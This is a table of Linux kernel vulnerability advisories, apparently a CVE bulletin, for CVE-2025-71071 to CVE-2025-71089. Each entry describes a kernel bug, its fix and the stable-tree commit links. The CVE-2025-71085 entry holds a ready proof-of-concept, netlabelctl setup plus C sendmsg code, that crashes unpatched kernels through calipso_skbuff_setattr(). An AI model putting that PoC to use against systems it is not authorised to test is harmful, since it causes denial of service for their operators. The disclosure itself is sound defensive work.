| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: iommu/mediatek: fix use-after-free on probe deferral The driver is dropping the references taken to the larb devices during probe after successful lookup as well as on errors. This can potentially lead to a use-after-free in case a larb device has not yet been bound to its driver so that the iommu driver probe defers. Fix this by keeping the references as expected while the iommu driver is bound. | 2026-01-13 | not yet calculated | CVE-2025-71071 | https://git.kernel.org/stable/c/896ec55da3b90bdb9fc04fedc17ad8c359b2eee5 https://git.kernel.org/stable/c/5c04217d06a1161aaf36267e9d971ab6f847d5a7 https://git.kernel.org/stable/c/1ef70a0b104ae8011811f60bcfaa55ff49385171 https://git.kernel.org/stable/c/f6c08d3aa441bbc1956e9d65f1cbb89113a5aa8a https://git.kernel.org/stable/c/de83d4617f9fe059623e97acf7e1e10d209625b5 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: shmem: fix recovery on rename failures maple_tree insertions can fail if we are seriously short on memory; simple_offset_rename() does not recover well if it runs into that. The same goes for simple_offset_rename_exchange(). Moreover, shmem_whiteout() expects that if it succeeds, the caller will progress to d_move(), i.e. that shmem_rename2() won't fail past the successful call of shmem_whiteout(). Not hard to fix, fortunately - mtree_store() can't fail if the index we are trying to store into is already present in the tree as a singleton. For simple_offset_rename_exchange() that's enough - we just need to be careful about the order of operations. For simple_offset_rename() solution is to preinsert the target into the tree for new_dir; the rest can be done without any potentially failing operations. That preinsertion has to be done in shmem_rename2() rather than in simple_offset_rename() itself - otherwise we'd need to deal with the possibility of failure after successful shmem_whiteout(). | 2026-01-13 | not yet calculated | CVE-2025-71072 | https://git.kernel.org/stable/c/4b0fe71fb3965d0db83cdfc2f4fe0b3227d70113 https://git.kernel.org/stable/c/4642686699a46718d7f2fb5acd1e9d866a9d9cca https://git.kernel.org/stable/c/e1b4c6a58304fd490124cc2b454d80edc786665c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Input: lkkbd - disable pending work before freeing device lkkbd_interrupt() schedules lk->tq via schedule_work(), and the work handler lkkbd_reinit() dereferences the lkkbd structure and its serio/input_dev fields. lkkbd_disconnect() and error paths in lkkbd_connect() free the lkkbd structure without preventing the reinit work from being queued again until serio_close() returns. This can allow the work handler to run after the structure has been freed, leading to a potential use-after-free. Use disable_work_sync() instead of cancel_work_sync() to ensure the reinit work cannot be re-queued, and call it both in lkkbd_disconnect() and in lkkbd_connect() error paths after serio_open(). | 2026-01-13 | not yet calculated | CVE-2025-71073 | https://git.kernel.org/stable/c/3a7cd1397c209076c371d53bf39a55c138f62342 https://git.kernel.org/stable/c/cffc4e29b1e2d44ab094cf142d7c461ff09b9104 https://git.kernel.org/stable/c/e58c88f0cb2d8ed89de78f6f17409d29cfab6c5c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: functionfs: fix the open/removal races ffs_epfile_open() can race with removal, ending up with file->private_data pointing to freed object. There is a total count of opened files on functionfs (both ep0 and dynamic ones) and when it hits zero, dynamic files get removed. Unfortunately, that removal can happen while another thread is in ffs_epfile_open(), but has not incremented the count yet. In that case open will succeed, leaving us with UAF on any subsequent read() or write(). The root cause is that ffs->opened is misused; atomic_dec_and_test() vs. atomic_add_return() is not a good idea, when object remains visible all along. To untangle that * serialize openers on ffs->mutex (both for ep0 and for dynamic files) * have dynamic ones use atomic_inc_not_zero() and fail if we had zero ->opened; in that case the file we are opening is doomed. * have the inodes of dynamic files marked on removal (from the callback of simple_recursive_removal()) - clear ->i_private there. * have open of dynamic ones verify they hadn't been already removed, along with checking that state is FFS_ACTIVE. | 2026-01-13 | not yet calculated | CVE-2025-71074 | https://git.kernel.org/stable/c/b49c766856fb5901490de577e046149ebf15e39d https://git.kernel.org/stable/c/e5bf5ee266633cb18fff6f98f0b7d59a62819eee |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: aic94xx: fix use-after-free in device removal path The asd_pci_remove() function fails to synchronize with pending tasklets before freeing the asd_ha structure, leading to a potential use-after-free vulnerability. When a device removal is triggered (via hot-unplug or module unload), race condition can occur. The fix adds tasklet_kill() before freeing the asd_ha structure, ensuring all scheduled tasklets complete before cleanup proceeds. | 2026-01-13 | not yet calculated | CVE-2025-71075 | https://git.kernel.org/stable/c/c8f6f88cd1df35155258285c4f43268b361819df https://git.kernel.org/stable/c/278455a82245a572aeb218a6212a416a98e418de https://git.kernel.org/stable/c/b3e655e52b98a1d3df41c8e42035711e083099f8 https://git.kernel.org/stable/c/e354793a7ab9bb0934ea699a9d57bcd1b48fc27b https://git.kernel.org/stable/c/a41dc180b6e1229ae49ca290ae14d82101c148c3 https://git.kernel.org/stable/c/751c19635c2bfaaf2836a533caa3663633066dcf https://git.kernel.org/stable/c/f6ab594672d4cba08540919a4e6be2e202b60007 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/xe/oa: Limit num_syncs to prevent oversized allocations The OA open parameters did not validate num_syncs, allowing userspace to pass arbitrarily large values, potentially leading to excessive allocations. Add check to ensure that num_syncs does not exceed DRM_XE_MAX_SYNCS, returning -EINVAL when the limit is violated. v2: use XE_IOCTL_DBG() and drop duplicated check. (Ashutosh) (cherry picked from commit e057b2d2b8d815df3858a87dffafa2af37e5945b) | 2026-01-13 | not yet calculated | CVE-2025-71076 | https://git.kernel.org/stable/c/b963636331fb4f3f598d80492e2fa834757198eb https://git.kernel.org/stable/c/338849090ee610ff6d11e5e90857d2c27a4121ab https://git.kernel.org/stable/c/f8dd66bfb4e184c71bd26418a00546ebe7f5c17a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: tpm: Cap the number of PCR banks tpm2_get_pcr_allocation() does not cap any upper limit for the number of banks. Cap the limit to eight banks so that out of bounds values coming from external I/O cause on only limited harm. | 2026-01-13 | not yet calculated | CVE-2025-71077 | https://git.kernel.org/stable/c/8ceee7288152bc121a6bf92997261838c78bfe06 https://git.kernel.org/stable/c/275c686f1e3cc056ec66c764489ec1fe1e51b950 https://git.kernel.org/stable/c/ceb70d31da5671d298bad94ae6c20e4bbb800f96 https://git.kernel.org/stable/c/d88481653d74d622d1d0d2c9bad845fc2cc6fd23 https://git.kernel.org/stable/c/b69492161c056d36789aee42a87a33c18c8ed5e1 https://git.kernel.org/stable/c/858344bc9210bea9ab2bdc7e9e331ba84c164e50 https://git.kernel.org/stable/c/faf07e611dfa464b201223a7253e9dc5ee0f3c9e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: powerpc/64s/slb: Fix SLB multihit issue during SLB preload On systems using the hash MMU, there is a software SLB preload cache that mirrors the entries loaded into the hardware SLB buffer. This preload cache is subject to periodic eviction - typically after every 256 context switches - to remove old entry. To optimize performance, the kernel skips switch_mmu_context() in switch_mm_irqs_off() when the prev and next mm_struct are the same. However, on hash MMU systems, this can lead to inconsistencies between the hardware SLB and the software preload cache. If an SLB entry for a process is evicted from the software cache on one CPU, and the same process later runs on another CPU without executing switch_mmu_context(), the hardware SLB may retain stale entries. If the kernel then attempts to reload that entry, it can trigger an SLB multi-hit error. The following timeline shows how stale SLB entries are created and can cause a multi-hit error when a process moves between CPUs without a MMU context switch. CPU 0 CPU 1 ----- ----- Process P exec swapper/1 load_elf_binary begin_new_exc activate_mm switch_mm_irqs_off switch_mmu_context switch_slb /* * This invalidates all * the entries in the HW * and setup the new HW * SLB entries as per the * preload cache. */ context_switch sched_migrate_task migrates process P to cpu-1 Process swapper/0 context switch (to process P) (uses mm_struct of Process P) switch_mm_irqs_off() switch_slb load_slb++ /* * load_slb becomes 0 here * and we evict an entry from * the preload cache with * preload_age(). We still * keep HW SLB and preload * cache in sync, that is * because all HW SLB entries * anyways gets evicted in * switch_slb during SLBIA. * We then only add those * entries back in HW SLB, * which are currently * present in preload_cache * (after eviction). */ load_elf_binary continues... setup_new_exec() slb_setup_new_exec() sched_switch event sched_migrate_task migrates process P to cpu-0 context_switch from swapper/0 to Process P switch_mm_irqs_off() /* * Since both prev and next mm struct are same we don't call * switch_mmu_context(). This will cause the HW SLB and SW preload * cache to go out of sync in preload_new_slb_context. Because there * was an SLB entry which was evicted from both HW and preload cache * on cpu-1. Now later in preload_new_slb_context(), when we will try * to add the same preload entry again, we will add this to the SW * preload cache and then will add it to the HW SLB. Since on cpu-0 * this entry was never invalidated, hence adding this entry to the HW * SLB will cause a SLB multi-hit error. */ load_elf_binary cont ---truncated--- | 2026-01-13 | not yet calculated | CVE-2025-71078 | https://git.kernel.org/stable/c/01324c0328181b94cf390bda22ff91c75126ea57 https://git.kernel.org/stable/c/2e9a95d60f1df7b57618fd5ef057aef331575bd2 https://git.kernel.org/stable/c/c9f865022a1823d814032a09906e91e4701a35fc https://git.kernel.org/stable/c/b13a3dbfa196af68eae2031f209743735ad416bf https://git.kernel.org/stable/c/895123c309a34d2cfccf7812b41e17261a3a6f37 https://git.kernel.org/stable/c/4ae1e46d8a290319f33f71a2710a1382ba5431e8 https://git.kernel.org/stable/c/00312419f0863964625d6dcda8183f96849412c6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: nfc: fix deadlock between nfc_unregister_device and rfkill_fop_write A deadlock can occur between nfc_unregister_device() and rfkill_fop_write() due to lock ordering inversion between device_lock and rfkill_global_mutex. The problematic lock order is: Thread A (rfkill_fop_write): rfkill_fop_write() mutex_lock(&rfkill_global_mutex) rfkill_set_block() nfc_rfkill_set_block() nfc_dev_down() device_lock(&dev->dev) <- waits for device_lock Thread B (nfc_unregister_device): nfc_unregister_device() device_lock(&dev->dev) rfkill_unregister() mutex_lock(&rfkill_global_mutex) <- waits for rfkill_global_mutex This creates a classic ABBA deadlock scenario. Fix this by moving rfkill_unregister() and rfkill_destroy() outside the device_lock critical section. Store the rfkill pointer in a local variable before releasing the lock, then call rfkill_unregister() after releasing device_lock. This change is safe because rfkill_fop_write() holds rfkill_global_mutex while calling the rfkill callbacks, and rfkill_unregister() also acquires rfkill_global_mutex before cleanup. Therefore, rfkill_unregister() will wait for any ongoing callback to complete before proceeding, and device_del() is only called after rfkill_unregister() returns, preventing any use-after-free. The similar lock ordering in nfc_register_device() (device_lock -> rfkill_global_mutex via rfkill_register) is safe because during registration the device is not yet in rfkill_list, so no concurrent rfkill operations can occur on this device. | 2026-01-13 | not yet calculated | CVE-2025-71079 | https://git.kernel.org/stable/c/2e0831e9fc46a06daa6d4d8d57a2738e343130c3 https://git.kernel.org/stable/c/e02a1c33f10a0ed3aba855ab8ae2b6c4c5be8012 https://git.kernel.org/stable/c/ee41f4f3ccf8cd6ba3732e867abbec7e6d8d12e5 https://git.kernel.org/stable/c/6b93c8ab6f6cda8818983a4ae3fcf84b023037b4 https://git.kernel.org/stable/c/8fc4632fb508432895430cd02b38086bdd649083 https://git.kernel.org/stable/c/f3a8a7c1aa278f2378b2f3a10500c6674dffdfda https://git.kernel.org/stable/c/1ab526d97a57e44d26fadcc0e9adeb9c0c0182f5 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ipv6: fix a BUG in rt6_get_pcpu_route() under PREEMPT_RT On PREEMPT_RT kernels, after rt6_get_pcpu_route() returns NULL, the current task can be preempted. Another task running on the same CPU may then execute rt6_make_pcpu_route() and successfully install a pcpu_rt entry. When the first task resumes execution, its cmpxchg() in rt6_make_pcpu_route() will fail because rt6i_pcpu is no longer NULL, triggering the BUG_ON(prev). It's easy to reproduce it by adding mdelay() after rt6_get_pcpu_route(). Using preempt_disable/enable is not appropriate here because ip6_rt_pcpu_alloc() may sleep. Fix this by handling the cmpxchg() failure gracefully on PREEMPT_RT: free our allocation and return the existing pcpu_rt installed by another task. The BUG_ON is replaced by WARN_ON_ONCE for non-PREEMPT_RT kernels where such races should not occur. | 2026-01-13 | not yet calculated | CVE-2025-71080 | https://git.kernel.org/stable/c/1dc33ad0867325f8d2c6d7b2a6f542d4f3121f66 https://git.kernel.org/stable/c/787515ccb2292f82eb0876993129154629a49651 https://git.kernel.org/stable/c/1adaea51c61b52e24e7ab38f7d3eba023b2d050d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ASoC: stm32: sai: fix OF node leak on probe The reference taken to the sync provider OF node when probing the platform device is currently only dropped if the set_sync() callback fails during DAI probe. Make sure to drop the reference on platform probe failures (e.g. probe deferral) and on driver unbind. This also avoids a potential use-after-free in case the DAI is ever reprobed without first rebinding the platform driver. | 2026-01-13 | not yet calculated | CVE-2025-71081 | https://git.kernel.org/stable/c/7daa50a2157e41c964b745ab1dc378b5b3b626d1 https://git.kernel.org/stable/c/acda653169e180b1d860dbb6bc5aceb105858394 https://git.kernel.org/stable/c/4054a3597d047f3fe87864ef87f399b5d523e6c0 https://git.kernel.org/stable/c/bae74771fc5d3b2a9cf6f5aa64596083d032c4a3 https://git.kernel.org/stable/c/3752afcc6d80d5525e236e329895ba2cb93bcb26 https://git.kernel.org/stable/c/23261f0de09427367e99f39f588e31e2856a690e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Bluetooth: btusb: revert use of devm_kzalloc in btusb This reverts commit 98921dbd00c4e ("Bluetooth: Use devm_kzalloc in btusb.c file"). In btusb_probe(), we use devm_kzalloc() to allocate the btusb data. This ties the lifetime of all the btusb data to the binding of a driver to one interface, INTF. In a driver that binds to other interfaces, ISOC and DIAG, this is an accident waiting to happen. The issue is revealed in btusb_disconnect(), where calling usb_driver_release_interface(&btusb_driver, data->intf) will have devm free the data that is also being used by the other interfaces of the driver that may not be released yet. To fix this, revert the use of devm and go back to freeing memory explicitly. | 2026-01-13 | not yet calculated | CVE-2025-71082 | https://git.kernel.org/stable/c/fff9206b0907252a41eb12b7c1407b9347df18b1 https://git.kernel.org/stable/c/cca0e9206e3bcc63cd3e72193e60149165d493cc https://git.kernel.org/stable/c/c0ecb3e4451fe94f4315e6d09c4046dfbc42090b https://git.kernel.org/stable/c/1e54c19eaf84ba652c4e376571093e58e144b339 https://git.kernel.org/stable/c/fdf7c640fb8a44a59b0671143d8c2f738bc48003 https://git.kernel.org/stable/c/252714f1e8bdd542025b16321c790458014d6880 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/ttm: Avoid NULL pointer deref for evicted BOs It is possible for a BO to exist that is not currently associated with a resource, e.g. because it has been evicted. When devcoredump tries to read the contents of all BOs for dumping, we need to expect this as well -- in this case, ENODATA is recorded instead of the buffer contents. | 2026-01-13 | not yet calculated | CVE-2025-71083 | https://git.kernel.org/stable/c/47a85604a761005d255ae38115ee630cc6931756 https://git.kernel.org/stable/c/4b9944493c6d92d7b29cfd83aaf3deb842b8da79 https://git.kernel.org/stable/c/3d004f7341d4898889801ebb2ef61ffca610dd6f https://git.kernel.org/stable/c/5a81095d3e1b521ac7cfe3b14d5f149bace3d6e0 https://git.kernel.org/stable/c/b94182b3d7228aec18d069cba56d5982e9bfe1b1 https://git.kernel.org/stable/c/491adc6a0f9903c32b05f284df1148de39e8e644 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/cm: Fix leaking the multicast GID table reference If the CM ID is destroyed while the CM event for multicast creating is still queued the cancel_work_sync() will prevent the work from running which also prevents destroying the ah_attr. This leaks a refcount and triggers a WARN: GID entry ref leak for dev syz1 index 2 ref=573 WARNING: CPU: 1 PID: 655 at drivers/infiniband/core/cache.c:809 release_gid_table drivers/infiniband/core/cache.c:806 [inline] WARNING: CPU: 1 PID: 655 at drivers/infiniband/core/cache.c:809 gid_table_release_one+0x284/0x3cc drivers/infiniband/core/cache.c:886 Destroy the ah_attr after canceling the work, it is safe to call this twice. | 2026-01-13 | not yet calculated | CVE-2025-71084 | https://git.kernel.org/stable/c/d5ce588a9552878859a4d44b70b724216c188a5f https://git.kernel.org/stable/c/abf38398724ecc888f62c678d288da40d11878af https://git.kernel.org/stable/c/ab668a58c4a2ccb6d54add7a76f2f955d15d0196 https://git.kernel.org/stable/c/c0acdee513239e1d6e1b490f56be0e6837dfd162 https://git.kernel.org/stable/c/5cb34bb5fd726491b809efbeb5cfd63ae5bf9cf3 https://git.kernel.org/stable/c/3ba6d01c4b3c584264dc733c6a2ecc5bbc8e0bb5 https://git.kernel.org/stable/c/57f3cb6c84159d12ba343574df2115fb18dd83ca |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() There exists a kernel oops caused by a BUG_ON(nhead < 0) at net/core/skbuff.c:2232 in pskb_expand_head(). This bug is triggered as part of the calipso_skbuff_setattr() routine when skb_cow() is passed headroom > INT_MAX (i.e. (int)(skb_headroom(skb) + len_delta) < 0). The root cause of the bug is due to an implicit integer cast in __skb_cow(). The check (headroom > skb_headroom(skb)) is meant to ensure that delta = headroom - skb_headroom(skb) is never negative, otherwise we will trigger a BUG_ON in pskb_expand_head(). However, if headroom > INT_MAX and delta <= -NET_SKB_PAD, the check passes, delta becomes negative, and pskb_expand_head() is passed a negative value for nhead. Fix the trigger condition in calipso_skbuff_setattr(). Avoid passing "negative" headroom sizes to skb_cow() within calipso_skbuff_setattr() by only using skb_cow() to grow headroom. PoC: Using `netlabelctl` tool: netlabelctl map del default netlabelctl calipso add pass doi:7 netlabelctl map add default address:0::1/128 protocol:calipso,7 Then run the following PoC: int fd = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP); // setup msghdr int cmsg_size = 2; int cmsg_len = 0x60; struct msghdr msg; struct sockaddr_in6 dest_addr; struct cmsghdr * cmsg = (struct cmsghdr *) calloc(1, sizeof(struct cmsghdr) + cmsg_len); msg.msg_name = &dest_addr; msg.msg_namelen = sizeof(dest_addr); msg.msg_iov = NULL; msg.msg_iovlen = 0; msg.msg_control = cmsg; msg.msg_controllen = cmsg_len; msg.msg_flags = 0; // setup sockaddr dest_addr.sin6_family = AF_INET6; dest_addr.sin6_port = htons(31337); dest_addr.sin6_flowinfo = htonl(31337); dest_addr.sin6_addr = in6addr_loopback; dest_addr.sin6_scope_id = 31337; // setup cmsghdr cmsg->cmsg_len = cmsg_len; cmsg->cmsg_level = IPPROTO_IPV6; cmsg->cmsg_type = IPV6_HOPOPTS; char * hop_hdr = (char *)cmsg + sizeof(struct cmsghdr); hop_hdr[1] = 0x9; //set hop size - (0x9 + 1) * 8 = 80 sendmsg(fd, &msg, 0); | 2026-01-13 | not yet calculated | CVE-2025-71085 | https://git.kernel.org/stable/c/86f365897068d09418488165a68b23cb5baa37f2 https://git.kernel.org/stable/c/6b7522424529556c9cbc15e15e7bd4eeae310910 https://git.kernel.org/stable/c/2bb759062efa188ea5d07242a43e5aa5464bbae1 https://git.kernel.org/stable/c/c53aa6a5086f03f19564096ee084a202a8c738c0 https://git.kernel.org/stable/c/bf3709738d8a8cc6fa275773170c5c29511a0b24 https://git.kernel.org/stable/c/73744ad5696dce0e0f43872aba8de6a83d6ad570 https://git.kernel.org/stable/c/58fc7342b529803d3c221101102fe913df7adb83 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: rose: fix invalid array index in rose_kill_by_device() rose_kill_by_device() collects sockets into a local array[] and then iterates over them to disconnect sockets bound to a device being brought down. The loop mistakenly indexes array[cnt] instead of array[i]. For cnt < ARRAY_SIZE(array), this reads an uninitialized entry; for cnt == ARRAY_SIZE(array), it is an out-of-bounds read. Either case can lead to an invalid socket pointer dereference and also leaks references taken via sock_hold(). Fix the index to use i. | 2026-01-13 | not yet calculated | CVE-2025-71086 | https://git.kernel.org/stable/c/819fb41ae54960f66025802400c9d3935eef4042 https://git.kernel.org/stable/c/ed2639414d43ba037f798eaf619e878309310451 https://git.kernel.org/stable/c/1418c12cd3bba79dc56b57b61c99efe40f579981 https://git.kernel.org/stable/c/9f6185a32496834d6980b168cffcccc2d6b17280 https://git.kernel.org/stable/c/b409ba9e1e63ccf3ab4cc061e33c1f804183543e https://git.kernel.org/stable/c/92d900aac3a5721fb54f3328f1e089b44a861c38 https://git.kernel.org/stable/c/6595beb40fb0ec47223d3f6058ee40354694c8e4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: iavf: fix off-by-one issues in iavf_config_rss_reg() There are off-by-one bugs when configuring RSS hash key and lookup table, causing out-of-bounds reads to memory [1] and out-of-bounds writes to device registers. Before commit 43a3d9ba34c9 ("i40evf: Allow PF driver to configure RSS"), the loop upper bounds were: i <= I40E_VFQF_{HKEY,HLUT}_MAX_INDEX which is safe since the value is the last valid index. That commit changed the bounds to: i <= adapter->rss_{key,lut}_size / 4 where `rss_{key,lut}_size / 4` is the number of dwords, so the last valid index is `(rss_{key,lut}_size / 4) - 1`. Therefore, using `<=` accesses one element past the end. Fix the issues by using `<` instead of `<=`, ensuring we do not exceed the bounds. [1] KASAN splat about rss_key_size off-by-one BUG: KASAN: slab-out-of-bounds in iavf_config_rss+0x619/0x800 Read of size 4 at addr ffff888102c50134 by task kworker/u8:6/63 CPU: 0 UID: 0 PID: 63 Comm: kworker/u8:6 Not tainted 6.18.0-rc2-enjuk-tnguy-00378-g3005f5b77652-dirty #156 PREEMPT(voluntary) Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2 04/01/2014 Workqueue: iavf iavf_watchdog_task Call Trace: <TASK> dump_stack_lvl+0x6f/0xb0 print_report+0x170/0x4f3 kasan_report+0xe1/0x1a0 iavf_config_rss+0x619/0x800 iavf_watchdog_task+0x2be7/0x3230 process_one_work+0x7fd/0x1420 worker_thread+0x4d1/0xd40 kthread+0x344/0x660 ret_from_fork+0x249/0x320 ret_from_fork_asm+0x1a/0x30 </TASK> Allocated by task 63: kasan_save_stack+0x30/0x50 kasan_save_track+0x14/0x30 __kasan_kmalloc+0x7f/0x90 __kmalloc_noprof+0x246/0x6f0 iavf_watchdog_task+0x28fc/0x3230 process_one_work+0x7fd/0x1420 worker_thread+0x4d1/0xd40 kthread+0x344/0x660 ret_from_fork+0x249/0x320 ret_from_fork_asm+0x1a/0x30 The buggy address belongs to the object at ffff888102c50100 which belongs to the cache kmalloc-64 of size 64 The buggy address is located 0 bytes to the right of allocated 52-byte region [ffff888102c50100, ffff888102c50134) The buggy address belongs to the physical page: page: refcount:0 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x102c50 flags: 0x200000000000000(node=0|zone=2) page_type: f5(slab) raw: 0200000000000000 ffff8881000418c0 dead000000000122 0000000000000000 raw: 0000000000000000 0000000080200020 00000000f5000000 0000000000000000 page dumped because: kasan: bad access detected Memory state around the buggy address: ffff888102c50000: 00 00 00 00 00 00 00 fc fc fc fc fc fc fc fc fc ffff888102c50080: 00 00 00 00 00 00 00 fc fc fc fc fc fc fc fc fc >ffff888102c50100: 00 00 00 00 00 00 04 fc fc fc fc fc fc fc fc fc ^ ffff888102c50180: 00 00 00 00 00 00 00 00 fc fc fc fc fc fc fc fc ffff888102c50200: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc | 2026-01-13 | not yet calculated | CVE-2025-71087 | https://git.kernel.org/stable/c/ceb8459df28d22c225a82d74c0f725f2a935d194 https://git.kernel.org/stable/c/5bb18bfd505ca1affbca921462c350095a6c798c https://git.kernel.org/stable/c/d7369dc8dd7cbf5cee3a22610028d847b6f02982 https://git.kernel.org/stable/c/18de0e41d69d97fab10b91fecf10ae78a5e43232 https://git.kernel.org/stable/c/f36de3045d006e6d9be1be495f2ed88d1721e752 https://git.kernel.org/stable/c/3095228e1320371e143835d0cebeef1a8a754c66 https://git.kernel.org/stable/c/6daa2893f323981c7894c68440823326e93a7d61 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mptcp: fallback earlier on simult connection Syzkaller reports a simult-connect race leading to inconsistent fallback status: WARNING: CPU: 3 PID: 33 at net/mptcp/subflow.c:1515 subflow_data_ready+0x40b/0x7c0 net/mptcp/subflow.c:1515 Modules linked in: CPU: 3 UID: 0 PID: 33 Comm: ksoftirqd/3 Not tainted syzkaller #0 PREEMPT(full) Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014 RIP: 0010:subflow_data_ready+0x40b/0x7c0 net/mptcp/subflow.c:1515 Code: 89 ee e8 78 61 3c f6 40 84 ed 75 21 e8 8e 66 3c f6 44 89 fe bf 07 00 00 00 e8 c1 61 3c f6 41 83 ff 07 74 09 e8 76 66 3c f6 90 <0f> 0b 90 e8 6d 66 3c f6 48 89 df e8 e5 ad ff ff 31 ff 89 c5 89 c6 RSP: 0018:ffffc900006cf338 EFLAGS: 00010246 RAX: 0000000000000000 RBX: ffff888031acd100 RCX: ffffffff8b7f2abf RDX: ffff88801e6ea440 RSI: ffffffff8b7f2aca RDI: 0000000000000005 RBP: 0000000000000000 R08: 0000000000000005 R09: 0000000000000007 R10: 0000000000000004 R11: 0000000000002c10 R12: ffff88802ba69900 R13: 1ffff920000d9e67 R14: ffff888046f81800 R15: 0000000000000004 FS: 0000000000000000(0000) GS:ffff8880d69bc000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000560fc0ca1670 CR3: 0000000032c3a000 CR4: 0000000000352ef0 Call Trace: <TASK> tcp_data_queue+0x13b0/0x4f90 net/ipv4/tcp_input.c:5197 tcp_rcv_state_process+0xfdf/0x4ec0 net/ipv4/tcp_input.c:6922 tcp_v6_do_rcv+0x492/0x1740 net/ipv6/tcp_ipv6.c:1672 tcp_v6_rcv+0x2976/0x41e0 net/ipv6/tcp_ipv6.c:1918 ip6_protocol_deliver_rcu+0x188/0x1520 net/ipv6/ip6_input.c:438 ip6_input_finish+0x1e4/0x4b0 net/ipv6/ip6_input.c:489 NF_HOOK include/linux/netfilter.h:318 [inline] NF_HOOK include/linux/netfilter.h:312 [inline] ip6_input+0x105/0x2f0 net/ipv6/ip6_input.c:500 dst_input include/net/dst.h:471 [inline] ip6_rcv_finish net/ipv6/ip6_input.c:79 [inline] NF_HOOK include/linux/netfilter.h:318 [inline] NF_HOOK include/linux/netfilter.h:312 [inline] ipv6_rcv+0x264/0x650 net/ipv6/ip6_input.c:311 __netif_receive_skb_one_core+0x12d/0x1e0 net/core/dev.c:5979 __netif_receive_skb+0x1d/0x160 net/core/dev.c:6092 process_backlog+0x442/0x15e0 net/core/dev.c:6444 __napi_poll.constprop.0+0xba/0x550 net/core/dev.c:7494 napi_poll net/core/dev.c:7557 [inline] net_rx_action+0xa9f/0xfe0 net/core/dev.c:7684 handle_softirqs+0x216/0x8e0 kernel/softirq.c:579 run_ksoftirqd kernel/softirq.c:968 [inline] run_ksoftirqd+0x3a/0x60 kernel/softirq.c:960 smpboot_thread_fn+0x3f7/0xae0 kernel/smpboot.c:160 kthread+0x3c2/0x780 kernel/kthread.c:463 ret_from_fork+0x5d7/0x6f0 arch/x86/kernel/process.c:148 ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245 </TASK> The TCP subflow can process the simult-connect syn-ack packet after transitioning to TCP_FIN1 state, bypassing the MPTCP fallback check, as the sk_state_change() callback is not invoked for * -> FIN_WAIT1 transitions. That will move the msk socket to an inconsistent status and the next incoming data will hit the reported splat. Close the race moving the simult-fallback check at the earliest possible stage - that is at syn-ack generation time. About the fixes tags: [2] was supposed to also fix this issue introduced by [3]. [1] is required as a dependence: it was not explicitly marked as a fix, but it is one and it has already been backported before [3]. In other words, this commit should be backported up to [3], including [2] and [1] if that's not already there. | 2026-01-13 | not yet calculated | CVE-2025-71088 | https://git.kernel.org/stable/c/b5f46a08269265e2f5e87d855287d6d22de0a32b https://git.kernel.org/stable/c/c9bf315228287653522894df9d851e9b43db9516 https://git.kernel.org/stable/c/79f80a7a47849ef1b3c25a0bedcc448b9cb551c1 https://git.kernel.org/stable/c/25f1ae942c097b7ae4ce5c2b9c6fefb8e3672b86 https://git.kernel.org/stable/c/71154bbe49423128c1c8577b6576de1ed6836830 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: iommu: disable SVA when CONFIG_X86 is set Patch series "Fix stale IOTLB entries for kernel address space", v7. This proposes a fix for a security vulnerability related to IOMMU Shared Virtual Addressing (SVA). In an SVA context, an IOMMU can cache kernel page table entries. When a kernel page table page is freed and reallocated for another purpose, the IOMMU might still hold stale, incorrect entries. This can be exploited to cause a use-after-free or write-after-free condition, potentially leading to privilege escalation or data corruption. This solution introduces a deferred freeing mechanism for kernel page table pages, which provides a safe window to notify the IOMMU to invalidate its caches before the page is reused. This patch (of 8): In the IOMMU Shared Virtual Addressing (SVA) context, the IOMMU hardware shares and walks the CPU's page tables. The x86 architecture maps the kernel's virtual address space into the upper portion of every process's page table. Consequently, in an SVA context, the IOMMU hardware can walk and cache kernel page table entries. The Linux kernel currently lacks a notification mechanism for kernel page table changes, specifically when page table pages are freed and reused. The IOMMU driver is only notified of changes to user virtual address mappings. This can cause the IOMMU's internal caches to retain stale entries for kernel VA. Use-After-Free (UAF) and Write-After-Free (WAF) conditions arise when kernel page table pages are freed and later reallocated. The IOMMU could misinterpret the new data as valid page table entries. The IOMMU might then walk into attacker-controlled memory, leading to arbitrary physical memory DMA access or privilege escalation. This is also a Write-After-Free issue, as the IOMMU will potentially continue to write Accessed and Dirty bits to the freed memory while attempting to walk the stale page tables. Currently, SVA contexts are unprivileged and cannot access kernel mappings. However, the IOMMU will still walk kernel-only page tables all the way down to the leaf entries, where it realizes the mapping is for the kernel and errors out. This means the IOMMU still caches these intermediate page table entries, making the described vulnerability a real concern. Disable SVA on x86 architecture until the IOMMU can receive notification to flush the paging cache before freeing the CPU kernel page table pages. | 2026-01-13 | not yet calculated | CVE-2025-71089 | https://git.kernel.org/stable/c/240cd7f2812cc25496b12063d11c823618f364e9 https://git.kernel.org/stable/c/c2c3f1a3fd74ef16cf115f0c558616a13a8471b4 https://git.kernel.org/stable/c/c341dee80b5df49a936182341b36395c831c2661 